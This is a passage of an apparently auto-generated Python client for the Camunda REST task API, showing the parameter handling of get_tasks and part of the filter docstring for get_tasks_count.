'process_instance_id',
'process_instance_id_in',
'process_instance_business_key',
'process_instance_business_key_expression',
'process_instance_business_key_in',
'process_instance_business_key_like',
'process_instance_business_key_like_expression',
'process_definition_id',
'process_definition_key',
'process_definition_key_in',
'process_definition_name',
'process_definition_name_like',
'execution_id',
'case_instance_id',
'case_instance_business_key',
'case_instance_business_key_like',
'case_definition_id',
'case_definition_key',
'case_definition_name',
'case_definition_name_like',
'case_execution_id',
'activity_instance_id_in',
'tenant_id_in',
'without_tenant_id',
'assignee',
'assignee_expression',
'assignee_like',
'assignee_like_expression',
'assignee_in',
'owner',
'owner_expression',
'candidate_group',
'candidate_group_expression',
'candidate_user',
'candidate_user_expression',
'include_assigned_tasks',
'involved_user',
'involved_user_expression',
'assigned',
'unassigned',
'task_definition_key',
'task_definition_key_in',
'task_definition_key_like',
'name',
'name_not_equal',
'name_like',
'name_not_like',
'description',
'description_like',
'priority',
'max_priority',
'min_priority',
'due_date',
'due_date_expression',
'due_after',
'due_after_expression',
'due_before',
'due_before_expression',
'follow_up_date',
'follow_up_date_expression',
'follow_up_after',
'follow_up_after_expression',
'follow_up_before',
'follow_up_before_expression',
'follow_up_before_or_not_existent',
'follow_up_before_or_not_existent_expression',
'created_on',
'created_on_expression',
'created_after',
'created_after_expression',
'created_before',
'created_before_expression',
'delegation_state',
'candidate_groups',
'candidate_groups_expression',
'with_candidate_groups',
'without_candidate_groups',
'with_candidate_users',
'without_candidate_users',
'active',
'suspended',
'task_variables',
'process_variables',
'case_instance_variables',
'variable_names_ignore_case',
'variable_values_ignore_case',
'parent_task_id',
'sort_by',
'sort_order',
'first_result',
'max_results'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
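# Reject unknown keyword arguments so that misspelled filter names fail fast.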
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tasks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
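# Map each provided snake_case argument to its camelCase REST query parameter.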
if 'process_instance_id' in local_var_params and local_var_params['process_instance_id'] is not None: # noqa: E501
query_params.append(('processInstanceId', local_var_params['process_instance_id'])) # noqa: E501
if 'process_instance_id_in' in local_var_params and local_var_params['process_instance_id_in'] is not None: # noqa: E501
query_params.append(('processInstanceIdIn', local_var_params['process_instance_id_in'])) # noqa: E501
if 'process_instance_business_key' in local_var_params and local_var_params['process_instance_business_key'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKey', local_var_params['process_instance_business_key'])) # noqa: E501
if 'process_instance_business_key_expression' in local_var_params and local_var_params['process_instance_business_key_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyExpression', local_var_params['process_instance_business_key_expression'])) # noqa: E501
if 'process_instance_business_key_in' in local_var_params and local_var_params['process_instance_business_key_in'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyIn', local_var_params['process_instance_business_key_in'])) # noqa: E501
if 'process_instance_business_key_like' in local_var_params and local_var_params['process_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLike', local_var_params['process_instance_business_key_like'])) # noqa: E501
if 'process_instance_business_key_like_expression' in local_var_params and local_var_params['process_instance_business_key_like_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLikeExpression', local_var_params['process_instance_business_key_like_expression'])) # noqa: E501
if 'process_definition_id' in local_var_params and local_var_params['process_definition_id'] is not None: # noqa: E501
query_params.append(('processDefinitionId', local_var_params['process_definition_id'])) # noqa: E501
if 'process_definition_key' in local_var_params and local_var_params['process_definition_key'] is not None: # noqa: E501
query_params.append(('processDefinitionKey', local_var_params['process_definition_key'])) # noqa: E501
if 'process_definition_key_in' in local_var_params and local_var_params['process_definition_key_in'] is not None: # noqa: E501
query_params.append(('processDefinitionKeyIn', local_var_params['process_definition_key_in'])) # noqa: E501
if 'process_definition_name' in local_var_params and local_var_params['process_definition_name'] is not None: # noqa: E501
query_params.append(('processDefinitionName', local_var_params['process_definition_name'])) # noqa: E501
if 'process_definition_name_like' in local_var_params and local_var_params['process_definition_name_like'] is not None: # noqa: E501
query_params.append(('processDefinitionNameLike', local_var_params['process_definition_name_like'])) # noqa: E501
if 'execution_id' in local_var_params and local_var_params['execution_id'] is not None: # noqa: E501
query_params.append(('executionId', local_var_params['execution_id'])) # noqa: E501
if 'case_instance_id' in local_var_params and local_var_params['case_instance_id'] is not None: # noqa: E501
query_params.append(('caseInstanceId', local_var_params['case_instance_id'])) # noqa: E501
if 'case_instance_business_key' in local_var_params and local_var_params['case_instance_business_key'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKey', local_var_params['case_instance_business_key'])) # noqa: E501
if 'case_instance_business_key_like' in local_var_params and local_var_params['case_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKeyLike', local_var_params['case_instance_business_key_like'])) # noqa: E501
if 'case_definition_id' in local_var_params and local_var_params['case_definition_id'] is not None: # noqa: E501
query_params.append(('caseDefinitionId', local_var_params['case_definition_id'])) # noqa: E501
if 'case_definition_key' in local_var_params and local_var_params['case_definition_key'] is not None: # noqa: E501
query_params.append(('caseDefinitionKey', local_var_params['case_definition_key'])) # noqa: E501
if 'case_definition_name' in local_var_params and local_var_params['case_definition_name'] is not None: # noqa: E501
query_params.append(('caseDefinitionName', local_var_params['case_definition_name'])) # noqa: E501
if 'case_definition_name_like' in local_var_params and local_var_params['case_definition_name_like'] is not None: # noqa: E501
query_params.append(('caseDefinitionNameLike', local_var_params['case_definition_name_like'])) # noqa: E501
if 'case_execution_id' in local_var_params and local_var_params['case_execution_id'] is not None: # noqa: E501
query_params.append(('caseExecutionId', local_var_params['case_execution_id'])) # noqa: E501
if 'activity_instance_id_in' in local_var_params and local_var_params['activity_instance_id_in'] is not None: # noqa: E501
query_params.append(('activityInstanceIdIn', local_var_params['activity_instance_id_in'])) # noqa: E501
if 'tenant_id_in' in local_var_params and local_var_params['tenant_id_in'] is not None: # noqa: E501
query_params.append(('tenantIdIn', local_var_params['tenant_id_in'])) # noqa: E501
if 'without_tenant_id' in local_var_params and local_var_params['without_tenant_id'] is not None: # noqa: E501
query_params.append(('withoutTenantId', local_var_params['without_tenant_id'])) # noqa: E501
if 'assignee' in local_var_params and local_var_params['assignee'] is not None: # noqa: E501
query_params.append(('assignee', local_var_params['assignee'])) # noqa: E501
if 'assignee_expression' in local_var_params and local_var_params['assignee_expression'] is not None: # noqa: E501
query_params.append(('assigneeExpression', local_var_params['assignee_expression'])) # noqa: E501
if 'assignee_like' in local_var_params and local_var_params['assignee_like'] is not None: # noqa: E501
query_params.append(('assigneeLike', local_var_params['assignee_like'])) # noqa: E501
if 'assignee_like_expression' in local_var_params and local_var_params['assignee_like_expression'] is not None: # noqa: E501
query_params.append(('assigneeLikeExpression', local_var_params['assignee_like_expression'])) # noqa: E501
if 'assignee_in' in local_var_params and local_var_params['assignee_in'] is not None: # noqa: E501
query_params.append(('assigneeIn', local_var_params['assignee_in'])) # noqa: E501
if 'owner' in local_var_params and local_var_params['owner'] is not None: # noqa: E501
query_params.append(('owner', local_var_params['owner'])) # noqa: E501
if 'owner_expression' in local_var_params and local_var_params['owner_expression'] is not None: # noqa: E501
query_params.append(('ownerExpression', local_var_params['owner_expression'])) # noqa: E501
if 'candidate_group' in local_var_params and local_var_params['candidate_group'] is not None: # noqa: E501
query_params.append(('candidateGroup', local_var_params['candidate_group'])) # noqa: E501
if 'candidate_group_expression' in local_var_params and local_var_params['candidate_group_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupExpression', local_var_params['candidate_group_expression'])) # noqa: E501
if 'candidate_user' in local_var_params and local_var_params['candidate_user'] is not None: # noqa: E501
query_params.append(('candidateUser', local_var_params['candidate_user'])) # noqa: E501
if 'candidate_user_expression' in local_var_params and local_var_params['candidate_user_expression'] is not None: # noqa: E501
query_params.append(('candidateUserExpression', local_var_params['candidate_user_expression'])) # noqa: E501
if 'include_assigned_tasks' in local_var_params and local_var_params['include_assigned_tasks'] is not None: # noqa: E501
query_params.append(('includeAssignedTasks', local_var_params['include_assigned_tasks'])) # noqa: E501
if 'involved_user' in local_var_params and local_var_params['involved_user'] is not None: # noqa: E501
query_params.append(('involvedUser', local_var_params['involved_user'])) # noqa: E501
if 'involved_user_expression' in local_var_params and local_var_params['involved_user_expression'] is not None: # noqa: E501
query_params.append(('involvedUserExpression', local_var_params['involved_user_expression'])) # noqa: E501
if 'assigned' in local_var_params and local_var_params['assigned'] is not None: # noqa: E501
query_params.append(('assigned', local_var_params['assigned'])) # noqa: E501
if 'unassigned' in local_var_params and local_var_params['unassigned'] is not None: # noqa: E501
query_params.append(('unassigned', local_var_params['unassigned'])) # noqa: E501
if 'task_definition_key' in local_var_params and local_var_params['task_definition_key'] is not None: # noqa: E501
query_params.append(('taskDefinitionKey', local_var_params['task_definition_key'])) # noqa: E501
if 'task_definition_key_in' in local_var_params and local_var_params['task_definition_key_in'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyIn', local_var_params['task_definition_key_in'])) # noqa: E501
if 'task_definition_key_like' in local_var_params and local_var_params['task_definition_key_like'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyLike', local_var_params['task_definition_key_like'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name_not_equal' in local_var_params and local_var_params['name_not_equal'] is not None: # noqa: E501
query_params.append(('nameNotEqual', local_var_params['name_not_equal'])) # noqa: E501
if 'name_like' in local_var_params and local_var_params['name_like'] is not None: # noqa: E501
query_params.append(('nameLike', local_var_params['name_like'])) # noqa: E501
if 'name_not_like' in local_var_params and local_var_params['name_not_like'] is not None: # noqa: E501
query_params.append(('nameNotLike', local_var_params['name_not_like'])) # noqa: E501
if 'description' in local_var_params and local_var_params['description'] is not None: # noqa: E501
query_params.append(('description', local_var_params['description'])) # noqa: E501
if 'description_like' in local_var_params and local_var_params['description_like'] is not None: # noqa: E501
query_params.append(('descriptionLike', local_var_params['description_like'])) # noqa: E501
if 'priority' in local_var_params and local_var_params['priority'] is not None: # noqa: E501
query_params.append(('priority', local_var_params['priority'])) # noqa: E501
if 'max_priority' in local_var_params and local_var_params['max_priority'] is not None: # noqa: E501
query_params.append(('maxPriority', local_var_params['max_priority'])) # noqa: E501
if 'min_priority' in local_var_params and local_var_params['min_priority'] is not None: # noqa: E501
query_params.append(('minPriority', local_var_params['min_priority'])) # noqa: E501
if 'due_date' in local_var_params and local_var_params['due_date'] is not None: # noqa: E501
query_params.append(('dueDate', local_var_params['due_date'])) # noqa: E501
if 'due_date_expression' in local_var_params and local_var_params['due_date_expression'] is not None: # noqa: E501
query_params.append(('dueDateExpression', local_var_params['due_date_expression'])) # noqa: E501
if 'due_after' in local_var_params and local_var_params['due_after'] is not None: # noqa: E501
query_params.append(('dueAfter', local_var_params['due_after'])) # noqa: E501
if 'due_after_expression' in local_var_params and local_var_params['due_after_expression'] is not None: # noqa: E501
query_params.append(('dueAfterExpression', local_var_params['due_after_expression'])) # noqa: E501
if 'due_before' in local_var_params and local_var_params['due_before'] is not None: # noqa: E501
query_params.append(('dueBefore', local_var_params['due_before'])) # noqa: E501
if 'due_before_expression' in local_var_params and local_var_params['due_before_expression'] is not None: # noqa: E501
query_params.append(('dueBeforeExpression', local_var_params['due_before_expression'])) # noqa: E501
if 'follow_up_date' in local_var_params and local_var_params['follow_up_date'] is not None: # noqa: E501
query_params.append(('followUpDate', local_var_params['follow_up_date'])) # noqa: E501
if 'follow_up_date_expression' in local_var_params and local_var_params['follow_up_date_expression'] is not None: # noqa: E501
query_params.append(('followUpDateExpression', local_var_params['follow_up_date_expression'])) # noqa: E501
if 'follow_up_after' in local_var_params and local_var_params['follow_up_after'] is not None: # noqa: E501
query_params.append(('followUpAfter', local_var_params['follow_up_after'])) # noqa: E501
if 'follow_up_after_expression' in local_var_params and local_var_params['follow_up_after_expression'] is not None: # noqa: E501
query_params.append(('followUpAfterExpression', local_var_params['follow_up_after_expression'])) # noqa: E501
if 'follow_up_before' in local_var_params and local_var_params['follow_up_before'] is not None: # noqa: E501
query_params.append(('followUpBefore', local_var_params['follow_up_before'])) # noqa: E501
if 'follow_up_before_expression' in local_var_params and local_var_params['follow_up_before_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeExpression', local_var_params['follow_up_before_expression'])) # noqa: E501
if 'follow_up_before_or_not_existent' in local_var_params and local_var_params['follow_up_before_or_not_existent'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistent', local_var_params['follow_up_before_or_not_existent'])) # noqa: E501
if 'follow_up_before_or_not_existent_expression' in local_var_params and local_var_params['follow_up_before_or_not_existent_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistentExpression', local_var_params['follow_up_before_or_not_existent_expression'])) # noqa: E501
if 'created_on' in local_var_params and local_var_params['created_on'] is not None: # noqa: E501
query_params.append(('createdOn', local_var_params['created_on'])) # noqa: E501
if 'created_on_expression' in local_var_params and local_var_params['created_on_expression'] is not None: # noqa: E501
query_params.append(('createdOnExpression', local_var_params['created_on_expression'])) # noqa: E501
if 'created_after' in local_var_params and local_var_params['created_after'] is not None: # noqa: E501
query_params.append(('createdAfter', local_var_params['created_after'])) # noqa: E501
if 'created_after_expression' in local_var_params and local_var_params['created_after_expression'] is not None: # noqa: E501
query_params.append(('createdAfterExpression', local_var_params['created_after_expression'])) # noqa: E501
if 'created_before' in local_var_params and local_var_params['created_before'] is not None: # noqa: E501
query_params.append(('createdBefore', local_var_params['created_before'])) # noqa: E501
if 'created_before_expression' in local_var_params and local_var_params['created_before_expression'] is not None: # noqa: E501
query_params.append(('createdBeforeExpression', local_var_params['created_before_expression'])) # noqa: E501
if 'delegation_state' in local_var_params and local_var_params['delegation_state'] is not None: # noqa: E501
query_params.append(('delegationState', local_var_params['delegation_state'])) # noqa: E501
if 'candidate_groups' in local_var_params and local_var_params['candidate_groups'] is not None: # noqa: E501
query_params.append(('candidateGroups', local_var_params['candidate_groups'])) # noqa: E501
if 'candidate_groups_expression' in local_var_params and local_var_params['candidate_groups_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupsExpression', local_var_params['candidate_groups_expression'])) # noqa: E501
if 'with_candidate_groups' in local_var_params and local_var_params['with_candidate_groups'] is not None: # noqa: E501
query_params.append(('withCandidateGroups', local_var_params['with_candidate_groups'])) # noqa: E501
if 'without_candidate_groups' in local_var_params and local_var_params['without_candidate_groups'] is not None: # noqa: E501
query_params.append(('withoutCandidateGroups', local_var_params['without_candidate_groups'])) # noqa: E501
if 'with_candidate_users' in local_var_params and local_var_params['with_candidate_users'] is not None: # noqa: E501
query_params.append(('withCandidateUsers', local_var_params['with_candidate_users'])) # noqa: E501
if 'without_candidate_users' in local_var_params and local_var_params['without_candidate_users'] is not None: # noqa: E501
query_params.append(('withoutCandidateUsers', local_var_params['without_candidate_users'])) # noqa: E501
if 'active' in local_var_params and local_var_params['active'] is not None: # noqa: E501
query_params.append(('active', local_var_params['active'])) # noqa: E501
if 'suspended' in local_var_params and local_var_params['suspended'] is not None: # noqa: E501
query_params.append(('suspended', local_var_params['suspended'])) # noqa: E501
if 'task_variables' in local_var_params and local_var_params['task_variables'] is not None: # noqa: E501
query_params.append(('taskVariables', local_var_params['task_variables'])) # noqa: E501
if 'process_variables' in local_var_params and local_var_params['process_variables'] is not None: # noqa: E501
query_params.append(('processVariables', local_var_params['process_variables'])) # noqa: E501
if 'case_instance_variables' in local_var_params and local_var_params['case_instance_variables'] is not None: # noqa: E501
query_params.append(('caseInstanceVariables', local_var_params['case_instance_variables'])) # noqa: E501
if 'variable_names_ignore_case' in local_var_params and local_var_params['variable_names_ignore_case'] is not None: # noqa: E501
query_params.append(('variableNamesIgnoreCase', local_var_params['variable_names_ignore_case'])) # noqa: E501
if 'variable_values_ignore_case' in local_var_params and local_var_params['variable_values_ignore_case'] is not None: # noqa: E501
query_params.append(('variableValuesIgnoreCase', local_var_params['variable_values_ignore_case'])) # noqa: E501
if 'parent_task_id' in local_var_params and local_var_params['parent_task_id'] is not None: # noqa: E501
query_params.append(('parentTaskId', local_var_params['parent_task_id'])) # noqa: E501
if 'sort_by' in local_var_params and local_var_params['sort_by'] is not None: # noqa: E501
query_params.append(('sortBy', local_var_params['sort_by'])) # noqa: E501
if 'sort_order' in local_var_params and local_var_params['sort_order'] is not None: # noqa: E501
query_params.append(('sortOrder', local_var_params['sort_order'])) # noqa: E501
if 'first_result' in local_var_params and local_var_params['first_result'] is not None: # noqa: E501
query_params.append(('firstResult', local_var_params['first_result'])) # noqa: E501
if 'max_results' in local_var_params and local_var_params['max_results'] is not None: # noqa: E501
query_params.append(('maxResults', local_var_params['max_results'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
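# GET /task takes no request body; every filter is sent as a URL query parameter.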
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
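# Empty by default: the underlying API spec declares no auth scheme for this endpoint.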
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TaskDto]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tasks_count(self, **kwargs): # noqa: E501
"""get_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill a provided filter. Corresponds to the size of the result set when using the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/) method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_count(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the given business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the given comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the given comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the given comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of the user's groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as a substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as a substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a priority lower than or equal to the given value.
:param int min_priority: Restrict to tasks that have a priority higher than or equal to the given value.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
